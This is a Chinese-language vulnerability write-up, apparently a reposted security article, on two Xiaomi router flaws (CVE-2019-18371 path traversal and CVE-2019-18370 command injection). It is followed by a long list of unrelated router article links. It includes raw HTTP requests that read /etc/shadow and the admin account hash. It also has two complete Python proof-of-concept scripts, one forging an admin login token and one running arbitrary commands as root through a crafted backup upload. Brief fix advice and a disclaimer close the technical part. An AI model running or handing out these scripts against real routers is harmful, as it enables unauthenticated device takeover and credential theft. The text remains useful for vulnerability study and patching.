小米路由器任意文件读取及远程命令执行漏洞解析

一、漏洞描述

小米路由器是一款高配的智能路由器,具备强大的扩展,并且具备高速传输的特点,其传输速度最高可以达到866M,相比普通150M/300M的普通无线路由器具备更高无线传输速率。小米路由器系统存在任意文件读取漏洞和远程命令执行漏洞，攻击者通过该漏洞可以获取服务器权限，导致服务器失陷。

二、漏洞复现

系统首页地址及页面显示如下

 http://xx.xx.xx.xx/cgi-bin/luci/web

1、远程任意文件读取漏洞（CVE-2019-18371）

小米路由器的nginx配置文件错误，导致目录穿越漏洞，实现任意文件读取（无需登录）

nginx配置不当可导致目录穿越漏洞，

location /xxx {
  alias /abc/;
}

可通过访问http://domain.cn/xxx../etc/passwd实现目录穿越访问上级目录及其子目录文件。

在小米路由器的文件/etc/sysapihttpd/sysapihttpd.conf中，存在

location /api-third-party/download/extdisks {
  alias /extdisks/;
}

故可以任意文件读取根目录下的所有文件，而且是root权限，如访问http://xx.xx.xx.xx/api-third-party/download/extdisks../etc/shadow

类似的问题，存在多处如

location /backup/log {
  alias /tmp/syslogbackup/;
}


location /api-third-party/download/public {
  alias /userdisk/data/;
}
location /api-third-party/download/private {
  alias /userdisk/appdata/;
}

通过任意文件读取，登录路由器后台

不是明文存储密码，需要进行一定分析。关注两个过程，一是登录时前端js生成http post请求参数过程，二是验证用户登陆的后端过程。

登录时前端js生成http post请求参数过程

var Encrypt = {
    key: 'a2ffa5c9be07488bbb04a3a47d3c5f6a',
    iv: '64175472480004614961023454661220',
    nonce: null,
    init: function(){
        var nonce = this.nonceCreat();
        this.nonce = nonce;
        return this.nonce;
    },
    nonceCreat: function(){
        var type = 0;
        // 自己的mac地址
        var deviceId = '<%=mac%>';
        var time = Math.floor(new Date().getTime() / 1000);
        var random = Math.floor(Math.random() * 10000);
        return [type, deviceId, time, random].join('_');
    },
    oldPwd : function(pwd){ // oldPwd = sha1(nonce + sha1(pwd + 'a2ffa5c9be07488bbb04a3a47d3c5f6a'))
        return CryptoJS.SHA1(this.nonce + CryptoJS.SHA1(pwd + this.key).toString()).toString();
    },
  //...
};

可知oldPwd = sha1(nonce + sha1(pwd + 'a2ffa5c9be07488bbb04a3a47d3c5f6a'))，登陆请求包为

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: xx.xx.xx.xx


username=admin&password=c9e62da7b8a0b7a4918c5a90912ba81a9717f9ab&logtype=2&nonce=0_mac地址_时间戳_5248

验证用户登陆的后端过程

调用XQSecureUtil.checkUser函数

function checkUser(user, nonce, encStr)
    -- 从xiaoqiang 配置文件中读取信息
    local password = XQPreference.get(user, nil, "account")
    if password and not XQFunction.isStrNil(encStr) and not XQFunction.isStrNil(nonce) then
        if XQCryptoUtil.sha1(nonce..password) == encStr then
            return true
        end
    end
    XQLog.log(4, (luci.http.getenv("REMOTE_ADDR") or "").." Authentication failed", nonce, password, encStr)
    return false
end

跟进XQPreference.get函数可以知道是从/etc/config/account文件中读取某个字符串，这里称它为accountStr。

checkUser函数判断等式为(encStr为参数oldPwd)

sha1(nonce + sha1(密码 + 'a2ffa5c9be07488bbb04a3a47d3c5f6a'))
==
sha1(nonce + accountStr)

则

accountStr == sha1(密码 + 'a2ffa5c9be07488bbb04a3a47d3c5f6a')

故，只需要读取/etc/config/account得到accountStr即可构造如下数据包登陆

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: xx.xx.xx.xx


username=admin&password=sha1(nonce + account中保存的字符串)&logtype=2&nonce=0_mac地址_时间戳_5248

先执行任意文件读取POC，读取etc/shadow文件，验证漏洞的存在，在响应中将会得到回显

GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Connection: close

然后读取/etc/config/account得到accountStr即可构造数据包登陆

实现任意登陆POC如下

arbitrary_file_read_vulnerability.py

#!/usr/bin/python


import os
import re
import time
import base64
import random
import hashlib
import requests
from Crypto.Cipher import AES


proxies = {"http":"http://127.0.0.1:8080"}




def get_mac():
  ## get mac
  r0 = requests.get("http://xx.xx.xx.xx/cgi-bin/luci/web",proxies = proxies)
  mac = re.findall(r'deviceId = '(.*?)'', r0.text)[0]
  # print(mac)  
  return mac


def get_account_str():
  ## read /etc/config/account
  r1 = requests.get("http://xx.xx.xx.xx/api-third-party/download/extdisks../etc/config/account",proxies = proxies)
  print(r1.text)
  account_str = re.findall(r'admin'? '(.*)'', r1.text)[0]
  return account_str


def create_nonce(mac):
  type_ = 0
  deviceId = mac
  time_ = int(time.time())
  rand = random.randint(0,10000)
  return "%d_%s_%d_%d"%(type_, deviceId, time_, rand)


def calc_password(nonce, account_str):
  m = hashlib.sha1()
  m.update((nonce + account_str).encode('utf-8'))
  return m.hexdigest()


mac = get_mac()
account_str = get_account_str()
## login, get stok
nonce = create_nonce(mac)
password = calc_password(nonce, account_str)
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
r2 = requests.post("http://xx.xx.xx.xx/cgi-bin/luci/api/xqsystem/login", 
  data = data, 
  headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},proxies = proxies)
# print(r2.text)
stok = re.findall(r'"token":"(.*?)"',r2.text)[0]
print("stok="+stok)

可以获取到登录的stok。

2、远程命令执行漏洞（root权限）（CVE-2019-18370）

备份文件是tar.gz格式的，上传后tar zxf解压，所以构造备份文件，可以控制解压目录的文件内容，结合测试上传下载速度功能的sh脚本执行时读取测试url列表文件，并将url部分直接进行命令拼接执行。

备份文件解压导致/tmp/目录任意文件可控

在/usr/lib/lua/luci/controller/api/misystem.lua中，配置文件功能如下

function cUpload()
    local LuciFs = require("luci.fs")
    local XQBackup = require("xiaoqiang.module.XQBackup")
    local code = 0
    local canupload = true
    local uploadFilepath = "/tmp/cfgbackup.tar.gz"
    local fileSize = tonumber(LuciHttp.getenv("CONTENT_LENGTH"))
    if fileSize > 102400 then
        canupload = false
    end
    LuciHttp.setfilehandler(
        function(meta, chunk, eof)
            if canupload then
                if not fp then
                    if meta and meta.name == "image" then
                        fp = io.open(uploadFilepath, "w")
                    end
                end
                if chunk then
                    fp:write(chunk)
                end
                if eof then
                    fp:close()
                end
            else
                code = 1630
            end
        end
    )
    if LuciHttp.formvalue("image") and fp then
        code = 0
    end
    local result = {}
    if code == 0 then
        local ext = XQBackup.extract(uploadFilepath)
        if ext == 0 then
            result["des"] = XQBackup.getdes()
        else
            code = 1629
        end
    end
    if code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(code)
        LuciFs.unlink(uploadFilepath)
    end
    result["code"] = code
    LuciHttp.write_json(result)
end

其中调用XQBackup.extract(uploadFilepath)进行解压

-- 0:succeed
-- 1:file does not exist
-- 2:no description file
-- 3:no mbu file
function extract(filepath)
    local fs = require("nixio.fs")
    local tarpath = filepath
    if not tarpath then
        tarpath = TARMBUFILE
    end
    if not fs.access(tarpath) then
        return 1
    end
    os.execute("cd /tmp; tar -xzf "..tarpath.." >/dev/null 2>/dev/null")
    os.execute("rm "..tarpath.." >/dev/null 2>/dev/null")
    if not fs.access(DESFILE) then
        return 2
    end
    if not fs.access(MBUFILE) then
        return 3
    end
    return 0
end

可知，/tmp目录下的任意文件可控

/usr/bin/upload_speedtest,/usr/bin/download_speedtest等会读取/tmp/speedtest_urls.xml并提取url直接进行命令拼接，且这几个脚本可以通过web接口调用

举例，查看/usr/bin/download_speedtest文件

#!/usr/bin/env lua
-- ...
local cfg = {
-- ...
  ['xmlfile'] = "/usr/share/speedtest.xml",
        ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}
VERSION="__UNDEFINED__"
-- ...
-- 测试网速使用的url文件为，若存在/tmp/speedtest_urls.xml则使用，否则用/usr/share/speedtest.xml
local filename = ""
filexml = io.open(cfg.tmp_speedtest_xml)
if filexml then
    filexml:close()
    filename = cfg.tmp_speedtest_xml
else
    filename = cfg.xmlfile
end


local pp = io.open(filename)
local line = pp:read("*line")
local size = 0
local resources = {}
local u = ""
local pids = {}
-- ...
function wget_work(url)
  local _url = url
  pid = posix.fork()
  if pid < 0 then
    print("fork error")
    return -1
  elseif pid > 0 then
    --print(string.format("child pid %d
", pid))
  else
        -- 拼接命令，最终在这里执行
    os.execute('for i in $(seq '.. math.floor(cfg.nr/cfg.nc) ..'); do wget '.. url  ..
    " -q -O /dev/null; done")
  end
  return pid
end


while line do
    -- 从文件中提取url， 这里提取没有进行过滤
  local _, _, url = string.find(line,'')
  if url then
    table.insert(resources, url)
  end
  line = pp:read("*line")
end
pp:close()


local urls = mrandom(1, table.getn(resources), cfg.nc)


for k, v in ipairs(urls) do
  if VERSION == "LESSMEM" then
    local pid = wget_work_loop(resources[v])
  else
        -- VERSION 为 __UNDEFINED__， url直接作为参数
    local pid = wget_work(resources[v])
  end
  if(pid == 0) then
    os.exit(0)
  elseif(pid == -1) then
    done()
  end
end

调用的地方貌似有好几个，其中/usr/lib/lua/luci/controller/api/xqnetdetect.lua中

function netspeed()
    local XQPreference = require("xiaoqiang.XQPreference")
    local XQNSTUtil = require("xiaoqiang.module.XQNetworkSpeedTest")
    local code = 0
    local result = {}
    local history = LuciHttp.formvalue("history")
    if history then
        result["bandwidth"] = tonumber(XQPreference.get("BANDWIDTH", 0, "xiaoqiang"))
        result["download"] = tonumber(string.format("%.2f", 128 * result.bandwidth))
        result["bandwidth2"] = tonumber(XQPreference.get("BANDWIDTH2", 0, "xiaoqiang"))
        result["upload"] = tonumber(string.format("%.2f", 128 * result.bandwidth2))
    else
        os.execute("/etc/init.d/miqos stop")
        -- 这里调用了downloadSpeedTest
        local download = XQNSTUtil.downloadSpeedTest()
        if download then
            result["download"] = download
            result["bandwidth"] = tonumber(string.format("%.2f", 8 * download/1024))
            XQPreference.set("BANDWIDTH", tostring(result.bandwidth), "xiaoqiang")
        else
            code = 1588
        end
        if code ~= 0 then
           result["msg"] = XQErrorUtil.getErrorMessage(code)
        end
        os.execute("/etc/init.d/miqos start")
    end
    
    result["code"] = code
    LuciHttp.write_json(result)
end
function downloadSpeedTest()
    local speedtest = "/usr/bin/download_speedtest"
    local speed
    -- 直接调用sh文件
    for _, line in ipairs(LuciUtil.execl(speedtest)) do
        if not XQFunction.isStrNil(line) and line:match("^avg rx:") then
            speed = line:match("^avg rx:(%S+)")
            if speed then
                speed = tonumber(string.format("%.2f",speed/8))
            end
            break
        end
    end
    return speed
end

所以，我们只需要构造恶意的speedtest_urls.xml文件，构造备份文件，上传备份文件，然后调用网络测试相关的接口，即可以实现命令注入。

实现命令执行POC

template.xml文件

remote_command_execution_vulnerability.py

#!/usr/bin/python




import os
import tarfile
import requests


proxies = {"http":"http://127.0.0.1:8080"}




## get stok
stok = input("stok: ")


## make config file
command = input("command: ")
speed_test_filename = "speedtest_urls.xml"
with open("template.xml","rt",encoding='gb18030', errors='ignore') as f:
  template = f.read()
data = template.format(command=command)
# print(data)
with open("speedtest_urls.xml",'wt') as f:
  f.write(data)


with tarfile.open("payload.tar.gz", "w:gz") as tar:
  # tar.add("cfg_backup.des")
  # tar.add("cfg_backup.mbu")
  tar.add("speedtest_urls.xml")


## upload config file
print("start uploading config file ...")
r1 = requests.post("http://xx.xx.xx.xx/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(stok), files={"image":open("payload.tar.gz",'rb')}, proxies=proxies)
# print(r1.text)


## exec download speed test, exec command
print("start exec command...")
r2 = requests.get("http://xx.xx.xx.xx/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(stok), proxies=proxies)
# print(r2.text)


## read result file
r3 = requests.get("http://xx.xx.xx.xx/api-third-party/download/extdisks../tmp/1.txt", proxies=proxies)
if r3.status_code == 200:
  print("success, vul")
  print(r3.text)

结合二者，无需登录即可远程命令执行

经测试，在小米系列路由器中存在该漏洞，如小米路由器R3G、小米路由器R3A、小米路由器R4等

三、修复方案

1、任意文件读取

将/etc/sysapihttpd/sysapihttpd.conf中的形如以下形式修改为

location /xxx {
  alias /abc/;
}

修改为

location /xxx/ {
  alias /abc/;
}

2、远程命令执行

将备份文件格式修改为特定格式，直接读取备份文件内容，而不需使用解压

从speedtest_urls.xml中读取url时，进行必要的过滤，防止命令注入

文章作者守卫者安全，在此特别鸣谢。

声明安全技术类文章仅供参考，此文所提供的信息仅针对漏洞靶场进行渗透，未经授权请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。 本文所提供的工具仅用于学习，禁止用于其他目的，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。

阅读全文

信息安全(38665) 信息安全(38665)
路由器(111203) 路由器(111203)
小米路由器(9651) 小米路由器(9651)

4G工业路由器与普通路由器区别深度解析

`　　4G工业路由器与普通路由器区别深度解析　　4G工业路由器可帮助用户快速接入高速互联网，实现安全可靠的数据传输，广泛应用于交通、电力、金融、水利、气象、环保、工业自动化，能源矿产、医疗、农业

2018-03-15 16:51:38

4G工业级无线路由器

4G LTE网络达到数据远程无线传输功能的工业级户外高速无线上网终端。　　4G路由器采用高性能的工业级处理器，内置嵌入式实时操作系统与4G模块通信，采用串口、以太网LAN、以太网WAN、Wi-Fi作为

2018-03-02 14:43:16

解析路由器的工作原理

本地路由器和远程路由器，本地路由器是用来连接网络传输介质的，如光纤、同轴电缆、双绞线;远程路由器是用来连接远程传输介质，并要求相应的设备，如电话线要配调制解调器，无线要通过无线接收机、发射机。一般说来

2018-01-28 13:04:21

路由器分类

路由器分类概述当前路由器分类方法各异，一般来说可以按照交换能力、系统结构、在网络中的位置、设备功能以及接口性能等划分。各种分类方法有一定的关联，但是并不完全一致。上面提到的各种分类原则如下所述

2017-06-15 10:09:31

路由器参数设置和功能详解

路由器参数设置和功能详解路由器是整个网络与外界的通信出口,也是联系内部子网的桥梁。在网络组建的过程中，路由器的选购是极为重要的。在所有网络设备中，路由器的价格也是相当的昂贵，是网络设备的重头戏

2008-06-02 11:59:05

路由器固件的解包与打包

为：1.先用解包软件解包路由器固件将会得到固件核心文件。2.再把Client复制到固件的某个文件夹内，且注意赋予可执行的权限。3.用build-ng.sh进行最终的封包，生成新的固件。操作环境

2016-01-04 08:53:33

路由器基础知识问答篇

比特是"1"，表明地址中该位比特不用管，如果是"0"的话，表明地址中该位比特将被用来进行匹配。可以使用通配符。以下是一个路由器配置文件中的访问表例子

2009-05-24 23:51:25

路由器基础知识问答（一）

的后面进行讨论。）　　2、什么是访问表？　　访问表是管理者加入的一系列控制数据包在路由器中输入、输出的规则。它不是由路由器自己产生的。访问表能够允许或禁止数据包进入或输出到目的地。访问表的表项是顺序执行

2012-11-12 21:09:56

路由器基础知识问答（三）

适当参数的NO OFFSET- LIST命令可以清除这个偏移量。　　在以下的例子中，一个使用IGRP的路由器在所有输出度量值的时延上加上偏移量10： offset-list out 10下面是一个将相

2012-11-12 21:12:14

路由器基础知识问答（二）

[process-id] [metric metric - value ] [metric-type type - value ] [subnets]在这个命令中：◎protocol：指明路由器要进行路由再分配的源

2012-11-12 21:10:58

路由器方案板香橙派R1 Plus如何使用SSH远程登录

，并且允许 root 用户登录系统。ssh 登录前首先需要确保以太网已连接，然后使用 ifconfig 命令或者通过查看路由器的方式获取开发板的 IP 地址。1. Ubuntu 下 SSH 远程登录

2021-05-11 18:07:37

路由器测试的类型和方法

适用范围，只列出路由器测试中相当常到的远端测试法。其中，控制观察点（PCO）：通常由两个先入先出（FIFO）队列组成，其功能类似于一对输入输出端口，向队列一端发送命令，从同一队列的另一端接收应答信号

2018-12-12 18:32:28

路由器的种类

路由器的种类:路由器分类路由器是分类的，不是这样分的，一般来说可以分为家用宽带路由器、企业级路由器及电信级路由器。当然不同的路由器其功能、性能及价格等差异巨大。路由器的种类:路由器的种类1、功能上

2022-03-17 12:16:32

路由器的配置

显示。二、路由器的基本配置命令111.显示VRP软件版本以及路由器硬件版本在任何模式下均可显示VRP软件版本和路由器硬件版本，如在普通用户模式下执行show version命令即可2. 设置密码

2008-12-07 14:09:51

DeviceType协调器和路由器之间有什么区别？

Control Bridge 路由器用作路由器，但也能够发送串行命令。所以我的主 MCU 可以通过串行端口向控制桥路由器发送一个灯开/关命令，控制桥路由器将通过 Zigbee 发送该命令。它可以实现吗？

2023-03-20 08:01:29

IPv6路由器的优点

发现　　　邻居发现提供以下一些功能：　　路由器发现。这允许主机标识本地路由器。地址解析。这允许节点为相应的下一跃点地址解析链路层地址（替代地址解析协议 [ARP]）。H3C IPv6网解决方案地址

2011-01-25 17:25:36

Zigbee的协调器、路由器、终端的概念

的最高权限，是整个网络的维护者，还可以保持间接寻址用的表格绑定，同时还可以设计安全中心和执行其他动作，保持网络其他设备的通信。路由器：（router）路由器是一种支持关联的设备，能够实现其他节点的消息转发

2018-08-10 06:01:28

[分享]捷希智能无线路由915 ，300M高速数显路由器

WEP加密，支持WPA、802.1X等高级加密及安全机制。同时具有QSS快速安全设置，能够让用户轻松设置无线安全。通过web界面的设置向导，用户可以轻松快捷地配置路由器，同时具有远程Web管理功能

2010-05-17 23:43:11

[分享]捷希智能显屏路由器915，300M高速数显路由器

WEP加密，支持WPA、802.1X等高级加密及安全机制。同时具有QSS快速安全设置，能够让用户轻松设置无线安全。通过web界面的设置向导，用户可以轻松快捷地配置路由器，同时具有远程Web管理功能，用户

2010-05-18 19:39:37

ip地址是怎样通过nmcli命令直接连接wifi路由器的呢

ip地址是怎样通过nmcli命令直接连接wifi路由器的呢？有哪些步骤？

2022-02-11 09:22:51

zigbee 路由器控制数据没有被接收执行？

zigbee 路由器控制数据没有被接收执行？zigbee我在用协调器发送一些控制命令控制路由设备，发现其中一台路由器上的开关未被控制到，抓包时发现：该控制数据帧并未被捕捉，可是transID有增加

2016-03-31 11:52:00

【Aworks280试用体验】Eclipse与Aworks280的远程调试

/arm-fsl-linux-gnueabi/debug-root/usr/bin其中有gdbserver这个命令找到文件路径了还需要把它拷到系统里面既然是远程调试就以路由器来测试一下首先在/etc/rc.d

2015-12-10 17:06:58

【NetRouter试用体验】二、网络接入与路由器功能测试

Connent2Ap（为什么是Connet不是Connect......处女座情结泛滥了- -）使NetRouter连接到指定路由器，命令行返回“please reboot”后输入reboot指令是系统重启。重启

2016-02-29 23:19:44

买工业路由器看什么参数

接入十分重要。 7、协议支持，多协议支持，保障数据无损传输。 8、Flash、ram大小，路由器的flash相当于PC的硬盘，放的是路由器的软件，路由器的ram相当于PC的内存，是执行软件的地方，如果内存不够大，用起来可能会觉得卡，会死机，就是路由器不稳定。工业路由器：`

2020-10-22 17:53:38

交换机和路由器

； 4.执行或不执行路由处理。第三层交换机与传统路由器相比有如下优点： 1.子网间传输带宽可任意分配：传统路由器每个接口连接一个子网，子网通过路由器进行传输的速率被接口的带宽所限制。而三层交换机则不

2009-01-08 17:42:19

什么是4G工业路由器？4G工业路由器的应用有哪些？

什么是4G工业路由器？如何利用路由器远程运维？工业路由器都有些什么功能？这些问题我们平时在使用路由器或项目中都可能会遇到。我们使用的比较多的就是家用路由器与企业路由器。通俗来讲，家用路由器基本上只有

2020-01-27 16:28:12

优酷路由器L1一周上手测评

酷土豆路由宝铭牌标识，和白色S/N码和MAC地址贴纸，路由器左侧为一个USB2.0接口，支持局域网内文件读取和给电子产品充电，亲测手机和ipad可用。从侧面看路由器上部整体呈一弧面，四角非常圆润

2016-09-18 21:42:42

低端路由器和高端路由的区别

   最近看到有网友在论坛上提问：“低端路由器和高端路由器都是差不多的用法，为什么价格会相差这么远啊？”其实这个问题提得很不错，不少不熟悉产品技术的朋友基本上都会

2010-06-26 14:11:29

刚买了花生棒回去准备搭建小米远程结果

`今天刚买了个花生棒回去看着教程准备自己配合小米路由器搭建远程服务结果怎么弄都弄不好快绝望了。有没有高手指点下我应该怎么设置？怎么弄？`

2014-12-26 15:41:46

删除任意文件（包括正在运行的）绿色版

删除任意文件（包括正在运行的）绿色版

2009-05-14 11:42:09

华为路由器配置教程

华为路由器配置教程,手册大全一系统基本命令：主要介绍命令行接口相关命令、配置文件管理命令、基本的系统管理命令、网络测试工具命令、系统调试命令、SNMP配置命令、日志配置命令和终端服务命令。二

2009-05-25 01:07:46

华为和思科路由器的互联配置

蚕食思科的市场分额。随着华为路由器在企业中的应用越来越多，实现华为路由器和思科路由器的互连，保护旧有的投资，对使用者具有重大的实用意义。　　华为路由器命令行接口配置界面在经过和思科的官司后做了较大的修改

2009-05-25 00:24:36

基于ARM Cortex-A9架构小米路由硬件配置如何，拆解达人来支招

双方意图构建完整云到端生态系统的战略现如今路由器领域也正悄悄上演一场变革，路由器就像手机一样正从“功能型”向“智能型”过渡。就在3月7日，小米路由器开启第三轮终极公测，联合迅雷发放1元公测资格，还送

2014-03-10 12:09:35

基于无线传感技术的网络路由器端口设计

另一机器，依据转发方式的不同，有多种应用场景。如以下所有的命令都是用SSH 客户端执行的。执行命令的计算机下面称为本地计算机。而远程服务器则是运行着SSH服务器的机器，远程机器能访问某个端口，但本地

2018-11-07 15:46:34

如何排除路由器故障

如何排除路由器故障路由器是网络中进行网间连接的关键设备。作为不同网络之间互相连接的枢纽，路由器系统构成了基于TCP/IP的Internet的主体脉络，也可以说，路由器是整个网络构架的“枢纽”。随着

2009-11-13 21:16:15

工业路由器的路由环路

在工业路由器网络中，并不是所有传输是通畅无阻的，会产生路由重分布、路由环路等等现象。当数据报在一系列路由器之间不断循环或往返传输却始终无法到达其预期目标网络的一种现象，称之为路由环路。当两台或多台

2013-10-22 09:43:10

巧妙解决路由器网络分层问题

七层模型从物理层开始向上进行。首先检查物理层，然后检查数据链路层，以此类推，设法确定通信失败的故障点，直到系统通信正常为止。网络诊断可以使用多种工具：路由器诊断命令，网络管理工具和包括局域网或广域网

2018-12-10 10:17:11

教你把废弃的U盘用作强大路由器

：　　DD-WRT X86版的“dd-wrt-public-vga.image(硬盘/存储卡安装镜像文件)”和“physdiskwrite 0.5.1(路由器IMG写盘工具)”，并解压到同一文件夹中，打开CMD

2012-02-02 16:02:16

让小米路由官方DDNS功能也支持二级路由

在小米路由器固件中虽然有官方DDNS功能，但是它不支持小米路由作为二级路由时使用DDNS。使用小米路由器作为二级路由而又想使用官方DDNS功能的同学们有福了，下面的教程教大家实现。默认官方DDNS

2016-05-17 13:45:43

请问小米小蚁摄像机远程视频传输原理是什么？

连接正常，你可以在办公室用手机APP来观察家里的动静。开箱介绍中有说，摄像头可以将录像存储在小米路由器的硬盘中，但这个和手机APP远程监控应该也没有直接关系。我的问题是，某人在办公室用手机连网并打开小米

2019-07-09 04:35:30

请问路由器设备自动入网怎么解决？

() 命令将路由器删除，可以看见回复正确删除，但是很快就看见路由器自动重新加入网络，网络地址是新分配的网络地址。请问，不是协调器启动网络后一段时间就禁止设备入网了吗？如果需要设备入网应该通过协调器发送

2018-08-18 06:35:53

请问协调器是怎么知道终端连着的路由器的？

如題:因為現用到將近50顆終端所以加上四個路由器從SNIFFER中看到協調器發命令給終端時協調器是先發到終端連接著的路由器那邊所以想請教一下協調器是怎麼知道終端連著的路由器的???謝謝.

2016-09-24 13:22:00

边界路由器有什么功能？

所谓边界路由器是将标准的路由软件看作n路本地路由，并将软件中的局域网部分扩展到广域网。这将导致远程路由器采用一套全新的、并且是极大简化了路由软件功能。

2019-09-30 09:01:58

重启路由器的具体方法

你没改过，那么就按铭牌上的填入，如果改了就填入自己改的密码进去。　　以小米路由器为例，进入管理界面后，点击右上角的上箭头，就会看到重启，点击它就重启路由器了。　　　　tplink路由器的重启位置

2020-12-08 15:24:19

如何配置路由器

如何配置路由器 【实训目的】（1）熟悉路由器。（2）了解路由器的配置方式。（3）掌握路由器的基本配置命令。（4）了解路

2008-12-07 14:09:48

3158

华为路由器配置命令 (很全的)

华为路由器配置命令 (很全的) 一、access-list 用于创建访问规则。　　　　（1）创建标准访问列表　　　

2009-05-25 08:20:18

11822

路由器网络接口解析

路由器网络接口解析 Router# show interface e0/0 Ethernet0/0 is up, line protocol is down Hardware is AmdP2, address is 0009.4375.5e20 (bia 0009.4375.5e20) I

2009-08-01 11:46:28

1909

路由器,路由器原理,路由器协议,路由器算法

路由器,路由器原理,路由器协议,路由器算法 路由器：连接因特网中各局域网、广域网的设备，它会根据信道的情况自动选择和设定路

2010-03-29 17:44:22

1247

路由器基本配置及路由器安全管理配置

掌握利用配置向导对 路由器 进行初始配置的步骤和命令，掌握查看路由器状态和配置的命令

2011-05-31 10:42:46

小米路由器高颜值

昨日，小米发布了全新一代路由器，小米路由器HD和小米路由器Pro，两者外观一致。

2017-03-03 16:08:09

2032

小米路由器Pro真机拆解图分享

小米正式发布了全新一代小米路由器，有Pro和HD两个型号，二者外观一直。小米路由器Pro搭载MT7621A MIPS双核880MHz处理器，内置256M SLC闪存和512MB DDR3-1200内存，支持800Mbps的2.4GHz Wi-Fi以及1733Mbps的5GHz Wi-Fi。

2017-03-06 17:04:58

73042

最强小米路由器诞生！搭载 MIPS 双核处理器

在今年的CES上，小米可以说是干货满满，除了发布白色小米MIX与小米电视4外，另一款重磅新品也同样备受关注，那就是小米路由HD 1TB版，售价为1299元。3月2号，小米正式召开小米路由新品品鉴会，由小米路由器掌门人唐沐，介绍了全新的小米路由器 HD以及小米路由PRO。

2017-04-24 16:19:47

5065

小米路由器HD怎么样？小米路由器HD拆解图

现在高端路由器没个千兆，你都不好意思叫高端路由器，最近小米推出了旗下的高端路由器——小米路由器HD，这款路由器主打大户型，4天线、金属机身、MU-MIMO、内置硬盘等，可谓是一款定位发烧的旗舰路由器，今天我们就来看看这款小米路由器做的怎么样吧！

2017-05-05 10:41:59

19971

小米发布小米路由器3G：外形与小米路由器3完全相同

近日，小米正式发布了旗下全新的路由器产品：小米路由器3G，它是小米路由器3的升级版。

2017-06-02 16:17:04

14009

小米路由器迎618购物节全系路由器降价还有新路由开售

小米618期间，小米路由器也迎来了一拨降价，今天（6月9日）包括小米路由器3/3C/HD/Pro，小米Wi-Fi放大器2等产品都有优惠。

2017-06-09 10:37:36

1215

小米路由器3G什么时候开售？小米路由器3G最新消息：249元开启预售！

小米科技的互联网智能家居这盘棋中，除了手机，最重要的就是核心智能路由器了，上个月，小米低调上架了一款新款小米路由器3G。

2017-07-23 04:56:05

2725

不可错过的小米路由器3G今日开售，颜值高又有料 249元现货购买

小米路由器3G目前已在小米商城正式开售，小米路由器3G目前是现货可购买。小米路由器3G是小米路由器3的升级版本，售价为249元，小米路由器3也降价至129元

2017-07-29 09:40:06

4415

基于H3C的路由器配置命令详解

本文档内容介绍了基于H3C的路由器配置命令详解。

2017-09-20 14:19:57

细数家用路由器的8大漏洞

、D-Link等知名厂商。通过厄运饼干漏洞，黑客能够监控一切通过与路由器进行连接的设备的所有数据，包括文件、电子邮件、登录信息等，在监控的同时还能在这些数据当中植入恶意软件。

2017-10-15 10:05:04

12606

基于漏洞库匹配的路由器漏洞探测技术

的安全性。因此，路由交换设备的安全性问题近年来越来越受到社会各界的关注。统计表明，目前路南设备的安全性不容乐观，不论家用路由器还是企业骨干网核心路由器都爆出过安全漏洞问题。因此，如果通过技术手段探测m路由器交换

2017-11-15 11:46:10

小米路由器、极路由和360路由器横向非专业测评对比

在看到这篇东西的时候，大家估计已经看到了太多的小米路由器的野心实测小米路由器之类的专业文章，所以本文不普及任何技术参数，只从一个重度路由器用户来谈谈自己对小米路由器、360路由器和极路由的看法

2017-12-04 20:43:02

720

小米全新路由器拆解，看看与老款有何区别

在推出全新小米路由器之前，雷军说小米的路由器在一年多的时间里已经卖出了200万台。此前，小米共有两款路由器产品，一款是“小米路由器mini”，一款是“小米路由器”，产品售价分别为129元和699元。推出“全新小米路由器”之后，由于价格与原来老款的“小米路由器”一样，老款的产品随即在小米网下线。

2018-07-30 09:45:00

32819

小米路由器4评测比普通百兆路由器快3倍还要多

以性价比代表的小米也在做路由器，而且是小米公司三大主要产品之一（手机、电视、路由器），截至去年已经推出三代设备，而今年则是迎来了第四代设备—小米路由器4。

2018-08-22 14:12:00

21992

全新小米路由器高清拆解图集

内在提升明显全新小米路由器拆解图赏

2018-10-30 10:03:55

13844

黑客破解漏洞取得D-Link路由器操控权

研究员发现，部分D-Link路由器存在多个漏洞，黑客利用这些漏洞可获得其全部控制权，且目前尚无安全补丁发布。在Linksys路由器中也出现了严重安全漏洞。

2018-10-20 11:02:36

4995

小米路由器下线了“自动重启”功能被不少用户吐槽

近日，小米路由器下线了“自动重启”功能，被不少用户吐槽。1月21日晚上，小米路由器在官微进行了回应。

2019-01-22 16:02:23

2115

ThinkPHP5.0.远程代码执行漏洞预警

Thinkphp5.0.*存在远程代码执行漏洞。攻击者可以利用漏洞实现任意代码执行等高危操作。

2019-01-26 16:26:00

2976

小米表示将推出旗下的新一代旗舰路由器

小米路由器已经有很长时间没有更新了，消费者也希望能够尽快看到小米推出新一代的路由器，而现在小米官方已经表示旗下的新一代旗舰路由器即将到来。

2019-02-28 10:59:20

1315

小米路由器4A和千兆版有什么区别

3月12日，小米路由器正式发布小米路由器4A和小米路由器4A千兆版两款路由器新品，售价分别为119元和169元。

2019-03-15 09:01:00

48979

小米路由器4A千兆版的区别分析

3月12日，小米路由器正式发布小米路由器4A和小米路由器4A千兆版两款路由器新品，售价分别为119元和169元。目前，小米路由器4A已经正式开售，而小米路由4A千兆版将于3月19日首售。那么小米同时发布的两款路由器究竟有哪些差别呢？

2019-03-14 11:45:33

25195

浅析漏洞对Cisco RV320、RV325两款路由器的影响

